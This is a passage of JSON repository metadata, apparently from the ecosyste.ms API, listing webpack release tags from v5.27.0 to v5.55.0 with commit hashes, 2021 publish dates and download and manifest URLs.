ack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/